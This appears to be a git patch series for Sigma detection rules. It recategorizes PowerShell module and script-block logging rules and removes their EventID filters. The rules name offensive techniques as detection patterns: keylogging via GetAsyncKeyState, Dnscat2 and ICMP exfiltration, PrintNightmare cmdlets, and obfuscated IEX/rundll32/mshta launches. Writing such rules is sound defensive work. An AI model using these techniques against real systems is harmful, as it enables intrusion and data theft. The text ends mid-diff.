Rodriguez @Cyb3rWard0g references: - https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190511223310.html @@ -16,11 +16,10 @@ tags: - attack.t1028 # an old one logsource: product: windows - service: powershell + category: ps_module definition: PowerShell Module Logging must be enabled detection: selection: - EventID: 4103 ContextInfo|contains|all: - ' = ServerRemoteHost ' # HostName: 'ServerRemoteHost' french : Nom d’hôte = - 'wsmprovhost.exe' # HostApplication|contains: 'wsmprovhost.exe' french Application hôte = diff --git a/rules/windows/powershell/powershell_module/powershell_susp_athremotefxvgpudisablementcommand.yml b/rules/windows/powershell/powershell_module/powershell_susp_athremotefxvgpudisablementcommand.yml index c6571b75..cd9751e1 100644 --- a/rules/windows/powershell/powershell_module/powershell_susp_athremotefxvgpudisablementcommand.yml +++ b/rules/windows/powershell/powershell_module/powershell_susp_athremotefxvgpudisablementcommand.yml @@ -3,7 +3,7 @@ id: 38a7625e-b2cb-485d-b83d-aff137d859f4 status: experimental author: frack113 date: 2021/07/13 -modified: 2021/09/07 +modified: 2021/10/16 description: RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339). references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md @@ -13,11 +13,9 @@ tags: - attack.t1218 logsource: product: windows - service: powershell + category: ps_module definition: PowerShell Module Logging must be enabledd detection: - selection_id: - EventID: 4103 selection_cmd: ContextInfo|contains: 'Invoke-ATHRemoteFXvGPUDisablementCommand ' selection_opt: @@ -26,7 +24,7 @@ detection: - '-ModulePath ' - '-ScriptBlock ' - '-RemoteFXvGPUDisablementFilePath' - condition: selection_id and selection_cmd and selection_opt + condition: selection_cmd and selection_opt fields: - ComputerName - User diff --git a/rules/windows/powershell/powershell_module/powershell_susp_zip_compress.yml b/rules/windows/powershell/powershell_module/powershell_susp_zip_compress.yml index 6e9268e7..26b0c14a 100644 --- a/rules/windows/powershell/powershell_module/powershell_susp_zip_compress.yml +++ b/rules/windows/powershell/powershell_module/powershell_susp_zip_compress.yml @@ -6,7 +6,7 @@ related: status: experimental author: frack113 date: 2021/07/20 -modified: 2021/10/09 +modified: 2021/10/16 description: Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md @@ -15,11 +15,10 @@ tags: - attack.t1074.001 logsource: product: windows - service: powershell + category: ps_module definition: PowerShell Module Logging must be enabledd detection: selection_4103: - EventID: 4103 ContextInfo|contains|all: - 'Compress-Archive ' - ' -Path ' From f6b0a891614e454ce1063c13838f7db219aec006 Mon Sep 17 00:00:00 2001 From: frack113 Date: Sat, 16 Oct 2021 08:18:49 +0200 Subject: [PATCH 1248/1367] change to category: ps_script --- .../powershell_script/powershell_accessing_win_api.yml | 5 ++--- .../powershell_script/powershell_adrecon_execution.yml | 4 ++-- .../powershell_automated_collection.yml | 5 ++--- .../powershell_cl_invocation_lolscript.yml | 5 ++--- .../powershell_cl_invocation_lolscript_count.yml | 5 ++--- .../powershell_cl_mutexverifiers_lolscript.yml | 5 ++--- .../powershell_cl_mutexverifiers_lolscript_count.yml | 5 ++--- .../powershell_script/powershell_create_local_user.yml | 5 ++--- .../powershell_script/powershell_data_compressed.yml | 5 ++--- .../powershell_script/powershell_detect_vm_env.yml | 5 ++--- .../powershell_script/powershell_dnscat_execution.yml | 5 ++--- .../powershell_script/powershell_icmp_exfiltration.yml | 4 ++-- .../powershell_script/powershell_invoke_nightmare.yml | 5 ++--- ...hell_invoke_obfuscation_clip_in_scriptblocktext.yml | 5 ++--- ...e_obfuscation_obfuscated_iex_in_scriptblocktext.yml | 10 ++++------ ...ell_invoke_obfuscation_stdin_in_scriptblocktext.yml | 5 ++--- ...shell_invoke_obfuscation_var_in_scriptblocktext.yml | 5 ++--- ...oke_obfuscation_via_compress_in_scriptblocktext.yml | 5 ++--- ...nvoke_obfuscation_via_rundll_in_scriptblocktext.yml | 5 ++--- ...invoke_obfuscation_via_stdin_in_scriptblocktext.yml | 5 ++--- ...oke_obfuscation_via_use_clip_in_scriptblocktext.yml | 5 ++--- ...ke_obfuscation_via_use_mhsta_in_scriptblocktext.yml | 5 ++--- ...obfuscation_via_use_rundll32_in_scriptblocktext.yml | 5 ++--- ...l_invoke_obfuscation_via_var_in_scriptblocktext.yml | 5 ++--- .../powershell_script/powershell_keylogging.yml | 7 +++---- .../powershell_malicious_commandlets.yml | 5 ++--- .../powershell_malicious_keywords.yml | 5 ++--- .../powershell_memorydump_getstoragediagnosticinfo.yml | 4 ++-- .../powershell_nishang_malicious_commandlets.yml | 5 ++--- .../powershell_script/powershell_ntfs_ads_access.yml | 6 ++---- .../powershell_powerview_malicious_commandlets.yml | 5 ++--- .../powershell_prompt_credentials.yml | 5 ++--- .../powershell_script/powershell_psattack.yml | 5 ++--- .../powershell_script/powershell_shellcode_b64.yml | 5 ++--- .../powershell_shellintel_malicious_commandlets.yml | 5 ++--- .../powershell_store_file_in_alternate_data_stream.yml | 7 +++---- ...powershell_susp_zip_compress_in_scriptblocktext.yml | 5 ++--- .../powershell_suspicious_export_pfxcertificate.yml | 3 +-- .../powershell_suspicious_getprocess_lsass.yml | 5 ++--- .../powershell_suspicious_keywords.yml | 5 ++--- .../powershell_suspicious_mail_acces.yml | 4 ++-- .../powershell_suspicious_mounted_share_deletion.yml | 4 ++-- .../powershell_script/powershell_suspicious_recon.yml | 5 ++--- .../powershell_suspicious_win32_pnpentity.yml | 4 ++-- .../powershell_script/powershell_timestomp.yml | 7 +++---- .../powershell_script/powershell_trigger_profiles.yml | 4 ++-- .../powershell_script/powershell_web_request.yml | 5 ++--- .../powershell_windows_firewall_profile_disabled.yml | 4 ++-- .../powershell_winlogon_helper_dll.yml | 5 ++--- .../powershell_script/powershell_wmi_persistence.yml | 7 +++---- .../powershell_script/powershell_wmimplant.yml | 5 ++--- 51 files changed, 107 insertions(+), 152 deletions(-) diff --git a/rules/windows/powershell/powershell_script/powershell_accessing_win_api.yml b/rules/windows/powershell/powershell_script/powershell_accessing_win_api.yml index 4599517b..7c600eb9 100644 --- a/rules/windows/powershell/powershell_script/powershell_accessing_win_api.yml +++ b/rules/windows/powershell/powershell_script/powershell_accessing_win_api.yml @@ -4,7 +4,7 @@ status: experimental description: Detecting use WinAPI Functions in PowerShell author: Nikita Nazarov, oscd.community date: 2020/10/06 -modified: 2021/08/04 +modified: 2021/10/16 references: - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse tags: @@ -13,11 +13,10 @@ tags: - attack.t1106 logsource: product: windows - service: powershell + category: ps_script definition: Script block logging must be enabled detection: selection: - EventID: 4104 ScriptBlockText|contains: - 'WaitForSingleObject' - 'QueueUserApc' diff --git a/rules/windows/powershell/powershell_script/powershell_adrecon_execution.yml b/rules/windows/powershell/powershell_script/powershell_adrecon_execution.yml index af2ba36a..799b4e99 100644 --- a/rules/windows/powershell/powershell_script/powershell_adrecon_execution.yml +++ b/rules/windows/powershell/powershell_script/powershell_adrecon_execution.yml @@ -11,13 +11,13 @@ tags: - attack.t1059.001 author: Bhabesh Raj date: 2021/07/16 +modified: 2021/10/16 logsource: product: windows - service: powershell + category: ps_script definition: Script block logging must be enabled detection: selection: - EventID: 4104 ScriptBlockText|contains: - 'Function Get-ADRExcelComOb' - 'ADRecon-Report.xlsx' #Default diff --git a/rules/windows/powershell/powershell_script/powershell_automated_collection.yml b/rules/windows/powershell/powershell_script/powershell_automated_collection.yml index d19a88ea..a56e163c 100644 --- a/rules/windows/powershell/powershell_script/powershell_automated_collection.yml +++ b/rules/windows/powershell/powershell_script/powershell_automated_collection.yml @@ -3,6 +3,7 @@ id: c1dda054-d638-4c16-afc8-53e007f3fbc5 status: experimental author: frack113 date: 2021/07/28 +modified: 2021/10/16 description: Once established within a system or network, an adversary may use automated techniques for collecting internal data. references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md @@ -11,11 +12,9 @@ tags: - attack.t1119 logsource: product: windows - service: powershell + category: ps_script definition: Script block logging must be enabled detection: - selection_eventid: - EventID: 4104 selection_ext: ScriptBlockText|contains: - '.doc' diff --git a/rules/windows/powershell/powershell_script/powershell_cl_invocation_lolscript.yml b/rules/windows/powershell/powershell_script/powershell_cl_invocation_lolscript.yml index 054cd341..24dd5f70 100644 --- a/rules/windows/powershell/powershell_script/powershell_cl_invocation_lolscript.yml +++ b/rules/windows/powershell/powershell_script/powershell_cl_invocation_lolscript.yml @@ -4,7 +4,7 @@ description: Detects Execution via SyncInvoke in CL_Invocation.ps1 module status: experimental author: oscd.community, Natalia Shornikova date: 2020/10/14 -modified: 2021/05/21 +modified: 2021/10/16 references: - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSScripts/Cl_invocation.yml - https://twitter.com/bohops/status/948061991012327424 @@ -13,11 +13,10 @@ tags: - attack.t1216 logsource: product: windows - service: powershell + category: ps_script definition: Script block logging must be enabled detection: selection: - EventID: 4104 ScriptBlockText|contains|all: - 'CL_Invocation.ps1' - 'SyncInvoke' diff --git a/rules/windows/powershell/powershell_script/powershell_cl_invocation_lolscript_count.yml b/rules/windows/powershell/powershell_script/powershell_cl_invocation_lolscript_count.yml index 7bce506c..4a05379f 100644 --- a/rules/windows/powershell/powershell_script/powershell_cl_invocation_lolscript_count.yml +++ b/rules/windows/powershell/powershell_script/powershell_cl_invocation_lolscript_count.yml @@ -4,7 +4,7 @@ description: Detects Execution via SyncInvoke in CL_Invocation.ps1 module status: experimental author: oscd.community, Natalia Shornikova date: 2020/10/14 -modified: 2021/05/21 +modified: 2021/10/16 references: - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSScripts/Cl_invocation.yml - https://twitter.com/bohops/status/948061991012327424 @@ -13,11 +13,10 @@ tags: - attack.t1216 logsource: product: windows - service: powershell + category: ps_script definition: Script block logging must be enabled detection: selection: - EventID: 4104 ScriptBlockText|contains: - 'CL_Invocation.ps1' - 'SyncInvoke' diff --git a/rules/windows/powershell/powershell_script/powershell_cl_mutexverifiers_lolscript.yml b/rules/windows/powershell/powershell_script/powershell_cl_mutexverifiers_lolscript.yml index 3430cdd7..8c888044 100644 --- a/rules/windows/powershell/powershell_script/powershell_cl_mutexverifiers_lolscript.yml +++ b/rules/windows/powershell/powershell_script/powershell_cl_mutexverifiers_lolscript.yml @@ -4,7 +4,7 @@ description: Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps status: experimental author: oscd.community, Natalia Shornikova date: 2020/10/14 -modified: 2021/05/21 +modified: 2021/10/16 references: - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSScripts/CL_mutexverifiers.yml - https://twitter.com/pabraeken/status/995111125447577600 @@ -13,11 +13,10 @@ tags: - attack.t1216 logsource: product: windows - service: powershell + category: ps_script definition: Script block logging must be enabled detection: selection: - EventID: 4104 ScriptBlockText|contains|all: - 'CL_Mutexverifiers.ps1' - 'runAfterCancelProcess' diff --git a/rules/windows/powershell/powershell_script/powershell_cl_mutexverifiers_lolscript_count.yml b/rules/windows/powershell/powershell_script/powershell_cl_mutexverifiers_lolscript_count.yml index ac2c9ed9..e449b6f6 100644 --- a/rules/windows/powershell/powershell_script/powershell_cl_mutexverifiers_lolscript_count.yml +++ b/rules/windows/powershell/powershell_script/powershell_cl_mutexverifiers_lolscript_count.yml @@ -4,7 +4,7 @@ description: Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps status: experimental author: oscd.community, Natalia Shornikova date: 2020/10/14 -modified: 2021/05/21 +modified: 2021/10/16 references: - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSScripts/CL_mutexverifiers.yml - https://twitter.com/pabraeken/status/995111125447577600 @@ -13,11 +13,10 @@ tags: - attack.t1216 logsource: product: windows - service: powershell + category: ps_script definition: Script block logging must be enabled detection: selection: - EventID: 4104 ScriptBlockText|contains: - 'CL_Mutexverifiers.ps1' - 'runAfterCancelProcess' diff --git a/rules/windows/powershell/powershell_script/powershell_create_local_user.yml b/rules/windows/powershell/powershell_script/powershell_create_local_user.yml index 29961866..a5b0d2a8 100644 --- a/rules/windows/powershell/powershell_script/powershell_create_local_user.yml +++ b/rules/windows/powershell/powershell_script/powershell_create_local_user.yml @@ -13,14 +13,13 @@ tags: - attack.t1136 # an old one author: '@ROxPinTeddy' date: 2020/04/11 -modified: 2021/08/04 +modified: 2021/10/16 logsource: product: windows - service: powershell + category: ps_script definition: Script block logging must be enabled detection: selection: - EventID: 4104 ScriptBlockText|contains: 'New-LocalUser' condition: selection falsepositives: diff --git a/rules/windows/powershell/powershell_script/powershell_data_compressed.yml b/rules/windows/powershell/powershell_script/powershell_data_compressed.yml index 72ba0304..c556a660 100644 --- a/rules/windows/powershell/powershell_script/powershell_data_compressed.yml +++ b/rules/windows/powershell/powershell_script/powershell_data_compressed.yml @@ -4,16 +4,15 @@ status: experimental description: An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. author: Timur Zinniatullin, oscd.community date: 2019/10/21 -modified: 2021/07/06 +modified: 2021/10/16 references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md logsource: product: windows - service: powershell + category: ps_script definition: Script block logging must be enabled detection: selection: - EventID: 4104 ScriptBlockText|contains|all: - '-Recurse' - '|' diff --git a/rules/windows/powershell/powershell_script/powershell_detect_vm_env.yml b/rules/windows/powershell/powershell_script/powershell_detect_vm_env.yml index 250b71fe..42e30727 100644 --- a/rules/windows/powershell/powershell_script/powershell_detect_vm_env.yml +++ b/rules/windows/powershell/powershell_script/powershell_detect_vm_env.yml @@ -3,6 +3,7 @@ id: d93129cd-1ee0-479f-bc03-ca6f129882e3 status: experimental author: frack113 date: 2021/08/03 +modified: 2021/10/16 description: Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md @@ -12,11 +13,9 @@ tags: - attack.t1497.001 logsource: product: windows - service: powershell + category: ps_script definition: EnableScriptBlockLogging must be set to enable detection: - selection_id: - EventID: 4104 selection_action: ScriptBlockText|contains: Get-WmiObject selection_module: diff --git a/rules/windows/powershell/powershell_script/powershell_dnscat_execution.yml b/rules/windows/powershell/powershell_script/powershell_dnscat_execution.yml index bfe388a4..69132d3f 100644 --- a/rules/windows/powershell/powershell_script/powershell_dnscat_execution.yml +++ b/rules/windows/powershell/powershell_script/powershell_dnscat_execution.yml @@ -4,7 +4,7 @@ description: Dnscat exfiltration tool execution status: experimental author: Daniil Yugoslavskiy, oscd.community date: 2019/10/24 -modified: 2020/08/24 +modified: 2021/10/16 tags: - attack.exfiltration - attack.t1048 @@ -13,11 +13,10 @@ tags: - attack.t1086 # an old one logsource: product: windows - service: powershell + category: ps_script definition: Script block logging must be enabled detection: selection: - EventID: 4104 ScriptBlockText|contains: "Start-Dnscat2" condition: selection falsepositives: diff --git a/rules/windows/powershell/powershell_script/powershell_icmp_exfiltration.yml b/rules/windows/powershell/powershell_script/powershell_icmp_exfiltration.yml index a9d9036a..b6479213 100644 --- a/rules/windows/powershell/powershell_script/powershell_icmp_exfiltration.yml +++ b/rules/windows/powershell/powershell_script/powershell_icmp_exfiltration.yml @@ -6,16 +6,16 @@ references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md#atomic-test-2---exfiltration-over-alternative-protocol---icmp author: 'Bartlomiej Czyz @bczyz1, oscd.community' date: 2020/10/10 +modified: 2021/10/16 tags: - attack.exfiltration - attack.t1048.003 logsource: product: windows - service: powershell + category: ps_script definition: Script block logging must be enabled detection: selection: - EventID: 4104 ScriptBlockText|contains|all: - 'New-Object' - 'System.Net.NetworkInformation.Ping' diff --git a/rules/windows/powershell/powershell_script/powershell_invoke_nightmare.yml b/rules/windows/powershell/powershell_script/powershell_invoke_nightmare.yml index 553f535e..5ad5d027 100644 --- a/rules/windows/powershell/powershell_script/powershell_invoke_nightmare.yml +++ b/rules/windows/powershell/powershell_script/powershell_invoke_nightmare.yml @@ -3,17 +3,16 @@ id: 6d3f1399-a81c-4409-aff3-1ecfe9330baf status: test description: Detects Commandlet name for PrintNightmare exploitation. date: 2021/08/09 -modified: 2021/08/31 +modified: 2021/10/16 references: - https://github.com/calebstewart/CVE-2021-1675 author: Max Altgelt, Tobias Michalski logsource: product: windows - service: powershell + category: ps_script definition: Script Block Logging must be enable detection: selection: - EventID: 4104 ScriptBlockText|contains: Invoke-Nightmare condition: selection falsepositives: diff --git a/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_clip_in_scriptblocktext.yml b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_clip_in_scriptblocktext.yml index 3d0f3df1..b4aa1b05 100644 --- a/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_clip_in_scriptblocktext.yml +++ b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_clip_in_scriptblocktext.yml @@ -4,7 +4,7 @@ description: Detects Obfuscated use of Clip.exe to execute PowerShell status: experimental author: Jonathan Cheong, oscd.community date: 2020/10/13 -modified: 2021/10/07 +modified: 2021/10/16 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task 26) tags: @@ -14,11 +14,10 @@ tags: - attack.t1059.001 logsource: product: windows - service: powershell + category: ps_script definition: Script block logging must be enabled detection: selection_4104: - EventID: 4104 ScriptBlockText|re: '.*cmd.{0,5}(?:\/c|\/r).+clip(?:\.exe)?.{0,4}&&.+clipboard]::\(\s\\\"\{\d\}.+\-f.+\"' condition: selection_4104 falsepositives: diff --git a/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_obfuscated_iex_in_scriptblocktext.yml b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_obfuscated_iex_in_scriptblocktext.yml index 687ea802..370d23f6 100644 --- a/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_obfuscated_iex_in_scriptblocktext.yml +++ b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_obfuscated_iex_in_scriptblocktext.yml @@ -4,7 +4,7 @@ description: "Detects all variations of obfuscated powershell IEX invocation cod status: experimental author: Daniel Bohannon (@Mandiant/@FireEye), oscd.community date: 2019/11/08 -modified: 2021/10/07 +modified: 2021/10/16 tags: - attack.defense_evasion - attack.t1027 @@ -13,12 +13,10 @@ tags: - attack.t1086 #an old one logsource: product: windows - service: powershell + category: ps_script definition: Script block logging must be enabled detection: - selection_1: - EventID: 4104 - selection_2: + selection_iex: - ScriptBlockText|re: '\$PSHome\[\s*\d{1,3}\s*\]\s*\+\s*\$PSHome\[' - ScriptBlockText|re: '\$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\[' - ScriptBlockText|re: '\$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\[' @@ -26,7 +24,7 @@ detection: - ScriptBlockText|re: '\\\\*mdr\\\\*\W\s*\)\.Name' - ScriptBlockText|re: '\$VerbosePreference\.ToString\(' - ScriptBlockText|re: '\String\]\s*\$VerbosePreference' - condition: selection_1 and selection_2 + condition: selection_iex falsepositives: - Unknown level: high diff --git a/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_stdin_in_scriptblocktext.yml b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_stdin_in_scriptblocktext.yml index 2cb8ef01..334e424a 100644 --- a/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_stdin_in_scriptblocktext.yml +++ b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_stdin_in_scriptblocktext.yml @@ -4,7 +4,7 @@ description: Detects Obfuscated use of stdin to execute PowerShell status: experimental author: Jonathan Cheong, oscd.community date: 2020/10/15 -modified: 2021/10/07 +modified: 2021/10/16 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task 25) tags: @@ -14,11 +14,10 @@ tags: - attack.t1059.001 logsource: product: windows - service: powershell + category: ps_script definition: Script block logging must be enabled detection: selection_4104: - EventID: 4104 ScriptBlockText|re: '.*cmd.{0,5}(?:\/c|\/r).+powershell.+(?:\$\{?input\}?|noexit).+\"' condition: selection_4104 falsepositives: diff --git a/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_var_in_scriptblocktext.yml b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_var_in_scriptblocktext.yml index c0460b5f..ae25eadb 100644 --- a/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_var_in_scriptblocktext.yml +++ b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_var_in_scriptblocktext.yml @@ -4,7 +4,7 @@ description: Detects Obfuscated use of Environment Variables to execute PowerShe status: experimental author: Jonathan Cheong, oscd.community date: 2020/10/15 -modified: 2021/10/07 +modified: 2021/10/16 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task 24) tags: @@ -14,11 +14,10 @@ tags: - attack.t1059.001 logsource: product: windows - service: powershell + category: ps_script definition: Script block logging must be enabled detection: selection_4104: - EventID: 4104 ScriptBlockText|re: '.*cmd.{0,5}(?:\/c|\/r)(?:\s|)\"set\s[a-zA-Z]{3,6}.*(?:\{\d\}){1,}\\\"\s+?\-f(?:.*\)){1,}.*\"' condition: selection_4104 falsepositives: diff --git a/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_compress_in_scriptblocktext.yml b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_compress_in_scriptblocktext.yml index 3151cae7..3a4a5231 100644 --- a/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_compress_in_scriptblocktext.yml +++ b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_compress_in_scriptblocktext.yml @@ -4,7 +4,7 @@ description: Detects Obfuscated Powershell via COMPRESS OBFUSCATION status: experimental author: Timur Zinniatullin, oscd.community date: 2020/10/18 -modified: 2021/10/07 +modified: 2021/10/16 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task 19) tags: @@ -14,11 +14,10 @@ tags: - attack.t1059.001 logsource: product: windows - service: powershell + category: ps_script definition: Script block logging must be enabled detection: selection_4104: - EventID: 4104 ScriptBlockText|re: '(?i).*new-object.*(?:system\.io\.compression\.deflatestream|system\.io\.streamreader).*text\.encoding\]::ascii.*readtoend' condition: selection_4104 falsepositives: diff --git a/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_rundll_in_scriptblocktext.yml b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_rundll_in_scriptblocktext.yml index b17ab890..e4d2ad84 100644 --- a/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_rundll_in_scriptblocktext.yml +++ b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_rundll_in_scriptblocktext.yml @@ -4,7 +4,7 @@ description: Detects Obfuscated Powershell via RUNDLL LAUNCHER status: experimental author: Timur Zinniatullin, oscd.community date: 2020/10/18 -modified: 2021/10/07 +modified: 2021/10/16 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task 23) tags: @@ -14,11 +14,10 @@ tags: - attack.t1059.001 logsource: product: windows - service: powershell + category: ps_script definition: Script block logging must be enabled detection: selection_4104: - EventID: 4104 ScriptBlockText|re: '(?i).*rundll32(?:\.exe)?(?:\s+)?shell32\.dll.*shellexec_rundll.*powershell.*\"' condition: selection_4104 falsepositives: diff --git a/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_stdin_in_scriptblocktext.yml b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_stdin_in_scriptblocktext.yml index c2b5f127..73cfb7ba 100644 --- a/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_stdin_in_scriptblocktext.yml +++ b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_stdin_in_scriptblocktext.yml @@ -4,7 +4,7 @@ description: Detects Obfuscated Powershell via Stdin in Scripts status: experimental author: Nikita Nazarov, oscd.community date: 2020/10/12 -modified: 2021/10/07 +modified: 2021/10/16 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task28) tags: @@ -14,11 +14,10 @@ tags: - attack.t1059.001 logsource: product: windows - service: powershell + category: ps_script definition: Script block logging must be enabled detection: selection_4104: - EventID: 4104 ScriptBlockText|re: '(?i).*(set).*&&\s?set.*(environment|invoke|\${?input).*&&.*"' condition: selection_4104 falsepositives: diff --git a/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_use_clip_in_scriptblocktext.yml b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_use_clip_in_scriptblocktext.yml index 9205a254..d2898f76 100644 --- a/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_use_clip_in_scriptblocktext.yml +++ b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_use_clip_in_scriptblocktext.yml @@ -4,7 +4,7 @@ description: Detects Obfuscated Powershell via use Clip.exe in Scripts status: experimental author: Nikita Nazarov, oscd.community date: 2020/10/09 -modified: 2021/10/07 +modified: 2021/10/16 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task29) tags: @@ -14,11 +14,10 @@ tags: - attack.t1059.001 logsource: product: windows - service: powershell + category: ps_script definition: Script block logging must be enabled detection: selection_4104: - EventID: 4104 ScriptBlockText|re: '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*' condition: selection_4104 falsepositives: diff --git a/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_use_mhsta_in_scriptblocktext.yml b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_use_mhsta_in_scriptblocktext.yml index d6455878..87a4ae6d 100644 --- a/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_use_mhsta_in_scriptblocktext.yml +++ b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_use_mhsta_in_scriptblocktext.yml @@ -4,7 +4,7 @@ description: Detects Obfuscated Powershell via use MSHTA in Scripts status: experimental author: Nikita Nazarov, oscd.community date: 2020/10/08 -modified: 2021/10/07 +modified: 2021/10/16 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task31) tags: @@ -14,11 +14,10 @@ tags: - attack.t1059.001 logsource: product: windows - service: powershell + category: ps_script definition: Script block logging must be enabled detection: selection_4104: - EventID: 4104 ScriptBlockText|re: '(?i).*(set).*(&&).*(mshta).*(vbscript:createobject).*(\.run).*\(window\.close\).*"' condition: selection_4104 falsepositives: diff --git a/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_use_rundll32_in_scriptblocktext.yml b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_use_rundll32_in_scriptblocktext.yml index 516fc3fc..b910c083 100644 --- a/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_use_rundll32_in_scriptblocktext.yml +++ b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_use_rundll32_in_scriptblocktext.yml @@ -4,7 +4,7 @@ description: Detects Obfuscated Powershell via use Rundll32 in Scripts status: experimental author: Nikita Nazarov, oscd.community date: 2019/10/08 -modified: 2021/10/07 +modified: 2021/10/16 references: - https://github.com/Neo23x0/sigma/issues/1009 tags: @@ -14,11 +14,10 @@ tags: - attack.t1059.001 logsource: product: windows - service: powershell + category: ps_script definition: Script block logging must be enabled detection: selection_4104: - EventID: 4104 ScriptBlockText|re: '(?i).*&&.*rundll32.*shell32\.dll.*shellexec_rundll.*(value|invoke|comspec|iex).*"' condition: selection_4104 falsepositives: diff --git a/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_var_in_scriptblocktext.yml b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_var_in_scriptblocktext.yml index cec226f8..b81f4aa0 100644 --- a/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_var_in_scriptblocktext.yml +++ b/rules/windows/powershell/powershell_script/powershell_invoke_obfuscation_via_var_in_scriptblocktext.yml @@ -4,7 +4,7 @@ description: Detects Obfuscated Powershell via VAR++ LAUNCHER status: experimental author: Timur Zinniatullin, oscd.community date: 2020/10/13 -modified: 2021/10/07 +modified: 2021/10/16 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task27) tags: @@ -14,11 +14,10 @@ tags: - attack.t1059.001 logsource: product: windows - service: powershell + category: ps_script definition: Script block logging must be enabled detection: selection_4104: - EventID: 4104 ScriptBlockText|re: '(?i).*&&set.*(\{\d\}){2,}\\\"\s+?\-f.*&&.*cmd.*\/c' # FPs with |\/r condition: selection_4104 falsepositives: diff --git a/rules/windows/powershell/powershell_script/powershell_keylogging.yml b/rules/windows/powershell/powershell_script/powershell_keylogging.yml index 82274561..6e2b8b56 100644 --- a/rules/windows/powershell/powershell_script/powershell_keylogging.yml +++ b/rules/windows/powershell/powershell_script/powershell_keylogging.yml @@ -3,6 +3,7 @@ id: 34f90d3c-c297-49e9-b26d-911b05a4866c status: experimental author: frack113 date: 2021/07/30 +modified: 2021/10/16 description: Adversaries may log user keystrokes to intercept credentials as the user types them. references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md @@ -12,18 +13,16 @@ tags: - attack.t1056.001 logsource: product: windows - service: powershell + category: ps_script definition: EnableScriptBlockLogging must be set to enable detection: - selection_id: - EventID: 4104 selection_basic: ScriptBlockText|contains: 'Get-Keystrokes' selection_high: # want to run in background and keyboard ScriptBlockText|contains|all: - 'Get-ProcAddress user32.dll GetAsyncKeyState' - 'Get-ProcAddress user32.dll GetForegroundWindow' - condition: selection_id and (selection_basic or selection_high) + condition: selection_basic or selection_high falsepositives: - Unknown level: medium diff --git 